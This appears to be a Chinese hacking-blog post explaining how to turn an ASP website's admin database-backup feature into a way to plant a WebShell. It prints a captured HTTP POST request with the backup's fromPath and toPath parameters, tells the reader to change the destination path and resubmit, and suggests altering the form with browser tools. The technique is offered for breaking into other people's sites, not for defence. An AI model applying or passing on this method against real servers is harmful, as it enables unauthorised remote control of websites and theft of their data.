简单突破数据库备份路径限制拿WebShell

  • A+
所属分类:lcx

作者:isosky

当后台可以数据库备份的时候,你是否顿时笑了?可当备份路径不能修改,而且后缀是mdb不变,你情何以堪?
这里就说个很简单的办法,进行一次数据库备份,并抓包下来。

POST /manage/DataManage.asp?From=Confirm&Action=DataBackup&Result=Site HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-shockwave-flash,
application/QVOD, application/QVOD, */*
Referer: http://www.xxx.com.cn/manage/DataManage.asp?
From=Confirm&Action=DataBackup&Result=Site
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: www.xxx.com.cn
Content-Length: 82
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDSADBRDSC=DOELADFALPBDPFKKHJGKGOAO; cnzz_a1183540=0; sin1183540=;
rtime=0; ltime=1307114195812; cnzz_eid=78248833-1307114200-

fromPath=..%2FDatabase%2Fameav_Site.mdb&toPath=..%2FDatabase%2FBak_ameav_Site.mdb

然后...然后...然后改路径,提交啊,路径可全在这了。

此外,如果RP够好.在提交表单的时候程序先从表单读值再执行备份的话,可以更YD..NC也不用了
1.如果你是用的火狐浏览器,装个Firebug 插件.即可随意YY~~
2.用的IE浏览器,可以使用啊D写的IE恶搞迷进行修改.不过大多时候是调用的网页,你需要找到真实的目标网页.才能去往真实的世界 :D

文章来源于lcx.cc:简单突破数据库备份路径限制拿WebShell

相关推荐: 美国政府入侵中国网络多年,透过入侵巨型路由器,一举入侵成千上万电脑

6月13日讯 针对揭露美国政府监控人民的斯诺登爆料,美国政府随时可以读取任何人的电邮,让包括谷歌在内的网络公司巨头致函美国政府自清等事件,与他最新爆料,美国政府已入侵中国大陆与香港特区的网络多年,白宫在12号都以调查仍在进行为由,选择不予回应。 斯诺登再爆料,…

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: